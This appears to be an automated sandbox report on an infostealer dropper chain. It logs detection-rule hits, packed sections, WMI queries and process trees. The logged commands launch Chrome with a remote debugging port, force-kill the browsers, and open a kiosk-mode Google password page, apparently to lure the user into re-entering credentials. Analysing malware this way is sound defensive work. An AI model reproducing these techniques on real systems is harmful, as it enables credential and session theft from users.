Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C559B10 appears 110 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B09D0 appears 343 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C553620 appears 96 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6BD930 appears 67 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C669F30 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0051DF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005180C0 appears 260 times

Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 572

Source: c20459f2e6.exe.12.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: random[1].exe.12.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: b24ae367e7.exe.12.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2141931206.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.3.n4e23hz.exe.6f623b8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 13.3.n4e23hz.exe.6f623b8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: Y-Cleaner.exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: jmepqeib ZLIB complexity 0.9946851218731163
Source: n4e23hz[1].exe.12.dr	Static PE information: Section: ZLIB complexity 0.9943704044117647
Source: n4e23hz[1].exe.12.dr	Static PE information: Section: kzyimikk ZLIB complexity 0.9950686517589821
Source: n4e23hz.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9943704044117647
Source: n4e23hz.exe.12.dr	Static PE information: Section: kzyimikk ZLIB complexity 0.9950686517589821
Source: random[1].exe0.12.dr	Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: random[1].exe0.12.dr	Static PE information: Section: beewzkou ZLIB complexity 0.994259854752191
Source: d985563cac.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: d985563cac.exe.12.dr	Static PE information: Section: beewzkou ZLIB complexity 0.994259854752191
Source: random[1].exe1.12.dr	Static PE information: Section: jmepqeib ZLIB complexity 0.9946851218731163
Source: 25045de666.exe.12.dr	Static PE information: Section: jmepqeib ZLIB complexity 0.9946851218731163

Source: 1124f3753f.exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: n4e23hz.exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: n4e23hz[1].exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@106/167@63/21

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C590300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LJRNL0E9.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Mutant created: \Sessions\1\BaseNamedObjects\clgbfqzkkypxjps
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2300
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.1880570433.00000000054C5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688859113.0000000005C01000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2779943985.0000000005C05000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2877798304.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2905972332.0000000005C18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2135006491.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: CAFIJKFHIJ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2192,i,1873079867265543632,18223947930530231182,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\CAFIJKFHIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\CAFIJKFHIJ.exe "C:\Users\user\Documents\CAFIJKFHIJ.exe"
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe "C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe "C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a180dc8-8c9c-4623-9a95-8d8228371a46} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 2739786e510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3380 -parentBuildID 20230927232528 -prefsHandle 4032 -prefMapHandle 1484 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d819197d-ad4a-4ad0-9b0f-25dcec234d88} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 27397886d10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe "C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d985563cac.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2060,i,10439888162211895715,7665317762376180404,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe "C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe"
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 572
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2192,i,1873079867265543632,18223947930530231182,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\CAFIJKFHIJ.exe "C:\Users\user\Documents\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe "C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe "C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe "C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe "C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process created: unknown unknown
